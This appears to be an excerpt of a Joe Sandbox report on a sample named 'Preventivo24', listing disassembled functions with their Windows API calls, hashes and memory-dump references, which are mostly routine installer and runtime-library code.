Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 27bca952c73d74bf39fb0778ba8960b7b2cb64747ff910550d4e4e56a2f70f1e
Instruction ID: 91a97cf9ce840126b2ec1d47a5be696c48da99eea787e029fb8f3b52af8586fa
Opcode Fuzzy Hash: 27bca952c73d74bf39fb0778ba8960b7b2cb64747ff910550d4e4e56a2f70f1e
Instruction Fuzzy Hash: 5E71F671A04219EFDB14DF64DC44BAEB7B8FB08724F00412AE915E7390EB769D00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8410 Relevance: 6.2, APIs: 4, Instructions: 217COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(011D003C,B5580983,011C63B8,0093A190,?,011D002C,011C63B8,010B1F80,000000FF,?,00FA866F), ref: 00FA84B2
EnterCriticalSection.KERNEL32(011D001C,B5580983), ref: 00FA852F
DestroyWindow.USER32(00000000), ref: 00FA854D
LeaveCriticalSection.KERNEL32(011D001C), ref: 00FA8596

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$DeleteDestroyEnterLeaveWindow
String ID:
API String ID: 307358592-0
Opcode ID: 0476a1a29ce731e460b1ac60bf8476caaed6f69c133d0b30a642ac8a460dbc5a
Instruction ID: c9d828f44acdec9cb283cc48c1d18a915b22573d8c0d08f7ec5625f567b9a40b
Opcode Fuzzy Hash: 0476a1a29ce731e460b1ac60bf8476caaed6f69c133d0b30a642ac8a460dbc5a
Instruction Fuzzy Hash: 9971E3B1E01201DFDB24DF54D848B5ABBB9FF49760F184129EC25AB784DBB4AC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE12F0 Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,?,00000000,00000000,?,00000000,?,?,?,00FDBE52,?,00000003), ref: 00FE13BD
GetLastError.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00FDBE52,?,00000003,00000009,B5580983,00000000), ref: 00FE13CE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00FE13EF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00FE1441

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: ad27a64912770f7e06af16f24743bb57339f79a123c7c2fca94ac1266f280341
Instruction ID: ce5f8392b9d386778f68b0eae705c49d92aef7f35781bc0e23c79e18a6f96f3d
Opcode Fuzzy Hash: ad27a64912770f7e06af16f24743bb57339f79a123c7c2fca94ac1266f280341
Instruction Fuzzy Hash: 34514972A00385FBDB209BA79C41F6BB299FF45310F244639F949E62C0EB76D840A755

Uniqueness

Uniqueness Score: -1.00%

Function 00EA19F0 Relevance: 6.2, APIs: 4, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00EA1B39
SysAllocString.OLEAUT32(00000000), ref: 00EA1B50
VariantClear.OLEAUT32(?), ref: 00EA1B6C
VariantClear.OLEAUT32(?), ref: 00EA1BA1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ClearVariant$AllocString
String ID:
API String ID: 2502263055-0
Opcode ID: 536d11ecb71c0cdceceb28fdf554e524084ed0caa90cf6dd1069d58087b3b07b
Instruction ID: eead2b0c20b5b1fe599d18df495ff8861f0a82c630371c5ac49d0fcd5454768f
Opcode Fuzzy Hash: 536d11ecb71c0cdceceb28fdf554e524084ed0caa90cf6dd1069d58087b3b07b
Instruction Fuzzy Hash: 6E518FB1A05259DFCB20DF28C841B99B7F4FF4D314F1455E9E919EB240EB35AD808B98

Uniqueness

Uniqueness Score: -1.00%

Function 00FD6040 Relevance: 6.2, APIs: 4, Instructions: 174COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00FD60A2
GetShortPathNameW.KERNEL32(?,?,?), ref: 00FD6121
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FD6171
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00FD61A7

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiNamePathShortWide
String ID:
API String ID: 3379522384-0
Opcode ID: 5e5b9f93d043ce955ced591f339f690d3be98f47fb1569d2dfbcbf28c91f2ea5
Instruction ID: 4ce0199dc57080ec6a88a5b21a71b6945ef110b199e961cc0818dc1225c417e6
Opcode Fuzzy Hash: 5e5b9f93d043ce955ced591f339f690d3be98f47fb1569d2dfbcbf28c91f2ea5
Instruction Fuzzy Hash: 67517C71A042059FDB14DFA8DD89B6EF7A6FF44324F14462AE925EB390DB35AC00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01005010 Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000A3,80000000,00000003,00000000,00000003,00000080,00000000,B5580983,00000000,Function_00028630), ref: 0100505A
GetFileSize.KERNEL32(00000000,00000000), ref: 0100508B
ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00010000), ref: 0100511B
CloseHandle.KERNEL32(00000000), ref: 010051E0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c35ec07505ce0a09461d72458568325b227807672d2249afea6cfb34c833a845
Instruction ID: 539fd1cfbc4f699f6dbc24f91a875e9e406ff2a3385645aeb45dadf3541ea3f4
Opcode Fuzzy Hash: c35ec07505ce0a09461d72458568325b227807672d2249afea6cfb34c833a845
Instruction Fuzzy Hash: 0E51F171900218AFFB21CF68CC84BDDBBB8EF11314F104199E599A72C1DB701A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F4BC20 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F4BCBB
GetWindowRect.USER32(?,?), ref: 00F4BCD3
GetWindowRect.USER32(?,?), ref: 00F4BD40
GetWindowLongW.USER32(?,000000EC), ref: 00F4BD64

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Rect$Long
String ID:
API String ID: 3486571012-0
Opcode ID: 9866afff7e51ca06fe369d6388edea07d08119aaa2dc74dfe73ec2db537020e8
Instruction ID: 6ff9fd617163899c07137a67c19e92260c0d9760dec86fe7f870cac9184958da
Opcode Fuzzy Hash: 9866afff7e51ca06fe369d6388edea07d08119aaa2dc74dfe73ec2db537020e8
Instruction Fuzzy Hash: 8C41BE32A093059FC314CF15D884A6BBBF8FF99714F04462EF99997255EB30E981CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2FB0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000FC,00000000), ref: 00EA3006
GetParent.USER32(?), ref: 00EA303A

Part of subcall function 0108A23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
Part of subcall function 0108A23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246

SetWindowLongW.USER32(?,000000EB), ref: 00EA307B
ShowWindow.USER32(?,00000000), ref: 00EA309D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$HeapLong$AllocParentProcessShow
String ID:
API String ID: 78937335-0
Opcode ID: f4f787b05d35b4c7012d6ce9c0650cf0b86e7dccb21e45c7ce0f124b7893a768
Instruction ID: af8ff62faed48bad51b73be5636cfee79cdd6c9cb56c8291fdd10cffdd4d6de0
Opcode Fuzzy Hash: f4f787b05d35b4c7012d6ce9c0650cf0b86e7dccb21e45c7ce0f124b7893a768
Instruction Fuzzy Hash: 5831E1316082149FCB14AF28D884A2BBBE8FF5D214B0441AAFC15EB396DB30ED41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010882C4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 010882CB
std::_Lockit::_Lockit.LIBCPMT ref: 010882D6
std::_Lockit::~_Lockit.LIBCPMT ref: 01088344

Part of subcall function 01088427: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0108843F

std::locale::_Setgloballocale.LIBCPMT ref: 010882F1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: ce5347e63c56705d258cb44375cb6de5c3eeeb83f65273c42f2dd9320e6488cf
Instruction ID: ab1fb1fb95004d375f1600b704cb26aa629eb0ca706618b49c0943da3adca773
Opcode Fuzzy Hash: ce5347e63c56705d258cb44375cb6de5c3eeeb83f65273c42f2dd9320e6488cf
Instruction Fuzzy Hash: EB01DF366056228FC70AFF20D944ABDBBB2FFA4300B548019E8A157384DF74AA42CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00E90FE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E90FF0

Part of subcall function 010880CC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00E91006,?,00000000,00000000), ref: 010880D8
Part of subcall function 010880CC: GetExitCodeThread.KERNEL32(?,00000000,?,?,?,00E91006,?,00000000,00000000), ref: 010880F1
Part of subcall function 010880CC: CloseHandle.KERNEL32(?,?,?,?,00E91006,?,00000000,00000000), ref: 01088103

std::_Throw_Cpp_error.LIBCPMT ref: 00E91019
std::_Throw_Cpp_error.LIBCPMT ref: 00E91020
std::_Throw_Cpp_error.LIBCPMT ref: 00E91027

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
String ID:
API String ID: 2210105531-0
Opcode ID: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
Instruction ID: b186d74bff8ff5b842d98fdbabecd70e0a7f78a9943d1c2eb19efd79ee467523
Opcode Fuzzy Hash: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
Instruction Fuzzy Hash: 67F0E2304047079EDB307AA48D0579272D89B20705F40CA6EA6E8564C0FAB2A4518B92

Uniqueness

Uniqueness Score: -1.00%

Function 00FB80F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FB82D6

Strings

ios_base::failbit set, xrefs: 00FB83B2
iostream, xrefs: 00FB84B0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ___std_exception_copy
String ID: ios_base::failbit set$iostream
API String ID: 2659868963-302468714
Opcode ID: 25196e1ea7a6e0fea5930ca84180e7e4894bef715015316d82775148e6c7fe89
Instruction ID: b5c0147520167987b554258792a69a96d41b229ae75b3a56dc1a05e77c3f73cd
Opcode Fuzzy Hash: 25196e1ea7a6e0fea5930ca84180e7e4894bef715015316d82775148e6c7fe89
Instruction Fuzzy Hash: A4C168B1D04248DFDB14DFA9C844BAEFBB4FF48314F24821AE864AB281DB745A45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E966F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 268windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00E96772
SendMessageW.USER32(00000008,00000000,00000000,00000000), ref: 00E96861

Part of subcall function 00E98520: SysFreeString.OLEAUT32(00000000), ref: 00E985E0

Strings

AtlAxWin140, xrefs: 00E9676A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateFreeMessageSendStringWindow
String ID: AtlAxWin140
API String ID: 4045344427-3842940177
Opcode ID: 522df428720cfdee456f20be768ee1f1166cb6ae942c3ac0b4b5f3958fa31366
Instruction ID: 0fe2c304fb9561a5d6b3a67cd260ab40eac94faf3d7dc122fd9d6c34e8d822ea
Opcode Fuzzy Hash: 522df428720cfdee456f20be768ee1f1166cb6ae942c3ac0b4b5f3958fa31366
Instruction Fuzzy Hash: 3CA17C75A10219DFCB18DF58C984B6EBBBAFF48714F1441AAE815AB395CB70AD01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7490 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 250COMMON

Download Yara Rule

Strings

ADVINST_LOGS, xrefs: 00FF7579
Everyone, xrefs: 00FF75A9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressAllocateFolderHeapLibraryLoadLocationProcSpecial
String ID: ADVINST_LOGS$Everyone
API String ID: 1617241543-3921853867
Opcode ID: f30c82fc6ac7e775455bea00a4102381d7ccac3af6b473e655fe5626f0e17038
Instruction ID: cfa08cc5723f48a1589563b9f4c79ec65851ed55cb122c96550c2aa315c4c09a
Opcode Fuzzy Hash: f30c82fc6ac7e775455bea00a4102381d7ccac3af6b473e655fe5626f0e17038
Instruction Fuzzy Hash: B2A1FF72D05209CFDB14EF68C949BAEF7B1AF04324F284158E911BB3A1DB356E05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FFFA80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00FFFBB3

Strings

User refused to install a newer version., xrefs: 00FFFC51
User accepted to install a newer version., xrefs: 00FFFC48, 00FFFC6F, 00FFFC70

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
